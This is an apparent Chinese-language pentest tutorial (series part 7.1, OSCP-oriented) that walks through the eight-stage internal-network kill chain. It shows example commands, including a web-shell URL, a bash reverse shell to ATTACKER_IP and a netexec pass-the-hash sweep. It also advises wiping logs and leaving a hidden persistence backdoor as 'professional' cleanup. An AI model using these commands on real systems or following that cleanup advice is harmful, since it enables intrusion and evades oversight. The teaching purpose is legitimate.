Skip to content
📌知识点小结
  • 内网渗透的核心认知是内网不是一台机器,而是一张互联互通的网;你拿到的第一台机器只是进入这张网的入口,不是终点。
  • 完整内网渗透可拆成八个阶段:侦察、边界突破、立足点建立、内网信息收集、权限提升、横向移动、目标达成、痕迹清理。
  • Kill Chain 的本质是一条环环相扣的链条,前一环断掉整条链就停在那里;渗透就是找最弱的那一环,防守就是让每一环都不那么好断。
  • 外网 Web 渗透追求的是单台机器的 RCE 与数据,内网渗透追求的是从一台机器跳到另一台、最终摸到域控和核心资产的整条路径。
  • OSCP 的内网题不是让你一上来就打域控,而是逼你先在边界拿到 foothold,再在受限网络里靠信息收集和隧道一步步向内推进。
自测一下

7.1 内网渗透 Kill Chain 全景

「内网框架与边界突破」系列 Part 1(免费)。 这一篇把内网渗透的完整生命周期讲清楚:从你站在互联网上两眼一抹黑,到最终摸到企业最核心的资产,中间到底分几步、每步在干什么、靠什么工具。 Part 2(7.2 内网架构:DMZ/分区)讲企业网络是怎么分区的,Part 3 讲双网卡主机与跳板,Part 4 盘点从哪些点能打进来。

一、先建立最反直觉的一个认知

很多人学渗透,是从"打一个网站、拿一个 Shell"开始的,脑子里的画面是:找到一个漏洞 → 执行命令 → whoami 一下 → 完事。这套思路在做外网 Web 渗透时确实成立,因为你面对的是一个孤零零的 Web 应用,拿下它就等于拿下了这台服务器。

但内网渗透完全不是这个画面。我先把最重要的一句话放在最前面:

内网不是一台机器,是一张网。

你真正攻破的第一台机器,往往只是这张网最外围的一台普通办公电脑,或者 DMZ 里一台对外提供服务的 Web 服务器。它既不是域管理员,也碰不到核心数据库,里面装的敏感数据可能一文不值。真正值钱的东西——财务库、员工个人信息、源代码、域控制器——都藏在这张网的深处,平时你连它的 IP 都不知道。

所以内网渗透的本质,不是"打赢一台机器",而是"在一张你看不见全貌的网里,从最外围的一个点,一步步摸到网的心脏"。这中间要认路、要借道、要偷钥匙、要绕开保安。把这个认知立住,后面所有的技术——信息收集、隧道、横向移动、域攻击——你才知道它们各自在这张大图里站在哪一格。

二、用"入室盗窃"把整个过程类比一遍

讲技术之前,先借一个人人都懂的类比。把企业内网想象成一个高档住宅小区:

  • 侦察:小偷提前踩点,围着小区转,看哪栋楼有摄像头、围墙多高、哪家窗户没关、保安几点换班。对应到渗透,就是你在互联网上先摸清这家企业有哪些对外暴露的资产、用了什么技术栈。
  • 边界突破:小偷翻围墙、撬侧门,钻进小区。对应到渗透,就是你找到一个能从互联网打进去的入口——一个 RCE、一个弱口令、一封钓鱼邮件。
  • 立足点建立:小偷先进到一楼一间没人的杂物间,确认暂时安全,先蹲下来喘口气。对应到渗透,就是你拿到第一个 foothold,确认能稳定执行命令、能反弹 Shell。
  • 内网信息收集:小偷在楼道里东张西望,看门牌、看监控位置、打听哪户人家最有钱。对应到渗透,就是你在已控机器上枚举网段、用户、共享、服务,搞清楚这张网长什么样。
  • 权限提升:杂物间的门只能开一楼,小偷想办法搞到更多钥匙,能上二楼、开电梯。对应到渗透,就是从一个低权限普通用户,提到本地管理员、甚至域管。
  • 横向移动:小偷从这间杂物间,顺着走廊走到别的房间、别的楼层。对应到渗透,就是用偷来的凭据,从这台机器跳到网段里的其他机器。
  • 目标达成:小偷终于进了那户最有钱的人家,拿走想要的东西。对应到渗透,就是摸到域控或核心数据库,拿到真正有价值的数据或控制权。
  • 痕迹清理:小偷走之前擦掉脚印、关掉监控。对应到渗透,就是清日志、退隧道、避免被蓝队发现。

你看,这八步环环相扣。任何一步出了问题——踩点踩错了、撬门被发现了、在楼道里迷路了——整条链就停在那里。Kill Chain(杀伤链)这个词的精髓就在"链"字上:它是一条一环扣一环的链,不是一堆孤立技巧的堆砌。

三、完整 Kill Chain 全景图

把上面的类比落成技术流程图,就是这张内网渗透的标准作战地图:

这张图你以后会反复用到。它不光是攻击路线,反过来也是防守方的检测思路:蓝队要在这八个环节的任何一环上发现你、打断你,而你作为攻击方,就是要在每个环节尽量安静、尽量不像"在攻击"。

四、逐阶段拆解:每步在干什么、用什么

下面把八个阶段逐个拆开讲。这里不求每个技术细节都讲透(那是后面几十篇的事),先让你知道每一步的目标和代表性工具

① 侦察(Recon)

站在攻击者的角度,你对这家企业几乎一无所知。侦察阶段的任务,是把"互联网上这家企业到底露了什么"摸清楚。

典型动作:子域名爆破、端口扫描、查网站指纹、搜泄露的凭据(比如泄露到 GitHub 上的代码、扔在网盘里的备份)、用资产测绘平台(Shodan、Censys、FOFA)反查它暴露了哪些服务。这个阶段你还没碰任何漏洞,只是在收集"有哪些门"。

一个最朴素的子域名探测:

bash
$ subfinder -d example.com -silent
www.example.com
vpn.example.com
oa.example.com
test.example.com

跑出来 vpn.example.comoa.example.com 这种,就说明企业的远程办公入口暴露在了公网——这往往就是后面要重点盯的门。

② 边界突破(Initial Access)

有了资产清单,下一步就是找一个能真正打进去的缺口。这一步就是大家常说的"外网打点"。常见的入口后面 7.4 会专门盘点,这里先列个印象:Web 应用的 RCE/文件上传、暴露在公网的未授权服务(Redis 未授权、Docker API)、VPN 或远程桌面的弱口令、一封精心构造的钓鱼邮件。

这一步的产出物很明确:一段能在目标机器上执行命令的能力。比如通过文件上传拿到一个一句话木马,再访问它执行命令:

text
http://target/uploads/shell.php?c=whoami

③ 立足点建立(Foothold)

能在网页里执行一句命令,和能稳定地控制这台机器,是两码事。网页里手敲命令又慢又容易断,还会被 WAF 盯着。所以第三步是把它升级成一个稳定的交互式 Shell——让目标机器主动连回来。

bash
# 攻击机监听
$ nc -lvnp 4444
listening on [any] 4444 ...
# 目标机执行反弹(Linux 示例)
$ bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

连上之后你就能敲 whoamiip apwd,开始真正"站在这台机器上"了。这台机器就是你的第一个立足点,后面所有向内的动作,都从这里出发。

④ 内网信息收集(Internal Recon)

现在你在这台机器上了,但你完全不知道:这台机器属于哪个网段?内网还有哪些活的机器?有没有域?谁是管理员?这一步就是"在楼道里看门牌"。

典型命令先看看自己长什么样:

bash
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536
2: eth0: inet 10.10.1.25/24   # 这是连出去的网卡
3: eth1: inet 192.168.50.10/24 # 咦?还有一块网卡在另一个网段!

看到 eth1 那个 192.168.50.0/24,你就该意识到:这台机器脚下还连着一片你刚才能见的新网络。这就是后面 7.3 要细讲的"双网卡主机"。再配合存活探测、端口扫描,你才能把这张网的轮廓一点点画出来。

⑤ 权限提升(Privilege Escalation)

刚拿到的 Shell,通常是个低权限用户——Web 服务的 www-data,或者一个普通办公账号。能干的事很有限。提权这一步,就是从"普通住户"变成"能开更多门的人"。

Windows 上常见的有服务错配、令牌窃取、注册表配置不当;Linux 上有 SUID 二进制、sudo 误配、内核漏洞。目标只有一个:拿到 SYSTEM / root,或者至少拿到一个能到处跑的本地管理员。有了高权限,你才能 dump 这台机器上的凭据(哈希、票据),而凭据正是横向移动的硬通货。

⑥ 横向移动(Lateral Movement)

这是内网渗透和外网渗透分水岭最大的一步。你现在有权限了、有凭据了,但这台机器能直接访问的东西有限。横向移动,就是带着偷来的钥匙,去开网段里其他机器的门。

经典做法是 Pass-the-Hash:你不用知道明文密码,直接拿着从内存里 dump 出来的哈希,远程登录另一台机器:

bash
$ netexec smb 192.168.50.0/24 -u Administrator -H <NTLM哈>
SMB  192.168.50.20  445  DC01  [+] Administrator:(Pwn3d!)

输出里那个 (Pwn3d!) 就是工具在告诉你:这把哈希在那台机器上直接好使,你又拿下一台。如果中间网络不通,你还要靠隧道(SSH 转发、chisel、ligolo-ng)把流量偷偷绕过去,这是 7B 系列的内容。

⑦ 目标达成(Objective)

打了这么久,你到底图什么?这一步才真正回答这个问题。可能是拿到域控制器的控制权,把整个域的账户体系握在手里;可能是拖走核心业务数据库;也可能是往关键系统里埋后门,做长期驻留。到这一步,一次完整的内网渗透才算"打完了"。

⑧ 痕迹清理(Cleanup)

专业的渗透最后一步一定是擦屁股。删掉你上传的工具、清掉 Windows 安全日志和 Linux 审计日志、退掉你建的隧道、留下一个隐蔽的持久化后门方便下次再来。这一步在 CTF 里可有可无,但在真实授权测试里,它体现的是你的专业度,也是对客户负责。

五、外网 Web 渗透 vs 内网渗透:一张表说清区别

很多人混淆这两件事,其实它们的思维方式完全不同。直接上表对比:

对比维度外网 Web 渗透内网渗透
面对对象单个 Web 应用/服务器一整张互联互通的企业网络
成功标志拿到该应用的 RCE / 数据从边界一台机器,横向到域控/核心资产
核心技能漏洞挖掘、Payload 构造信息收集、凭据利用、隧道、横向
网络视角你和目标之间就一条路网络被防火墙/VLAN 切成多块,要绕路
典型停留时间几分钟到几小时几天到几周,像在迷宫里走
失败常见原因漏洞找不到/被 WAF 拦信息收集不足、走错网段、隧道不通
工具侧重扫描器、字典、Burpnmap/netexec、C2、隧道工具、mimikatz

一句话总结:外网 Web 渗透是"点"上的功夫,内网渗透是"面"上的功夫。 外网你只要找到一个点打穿就行;内网你打穿一个点之后,才刚刚拿到一张迷宫的入口门票。

六、对标 OSCP:考试里它到底长什么样

如果你目标是考 OSCP,这张 Kill Chain 图几乎就是考试的剧本。OSCP 的内网题(AD 专项)不会让你从互联网直接打域控,而是按这个节奏逼你走:

  1. 先给你一台边界 Web 服务器,让你通过它拿到第一个 foothold;
  2. 进去之后你会发现自己在一个受限网段,根本扫不到域控,逼你做信息收集、找到一台双网卡主机;
  3. 逼你在这台主机上做提权、抓凭据;
  4. 再用隧道把自己的流量送进内网网段;
  5. 最后用拿到的凭据横向、打 Kerberos、拿域控。

把这条考试节奏画出来,你会发现它和前面的 Kill Chain 严丝合缝:

你会发现,考试就是把这条 Kill Chain 上每一环都埋了坑,看你哪一环不会就卡在哪。所以学内网,不要一上来就死磕"怎么打域控"这种最远端的技巧,而是要沿着这条链,把从侦察到横向的每一环都走扎实。 地基不牢,域控技巧背得再熟也用不上——因为你连边界都没进去。

七、本篇小结

  • 内网渗透的第一性原理:内网不是一台机器,是一张网;第一个 foothold 只是入口,不是终点。
  • 完整生命周期八个阶段:侦察 → 边界突破 → 立足点 → 内网信息收集 → 权限提升 → 横向移动 → 目标达成 → 痕迹清理,环环相扣。
  • Kill Chain 的"链"字意味着任何一环断掉整条链就停;攻击找最弱环,防守让每环都难断。
  • 外网 Web 渗透是点上的 RCE,内网渗透是面上的整张图推进,两者技能栈差别很大。
  • OSCP 内网题就是这条链的实战编排,沿链逐环打扎实比死记域控技巧更重要。

下一篇 7.2 我们走进这张网的内部,看看企业是怎么用 DMZ、VLAN、防火墙把一张网切成好几块的——这决定了你从一个区到另一个区,到底要闯几关。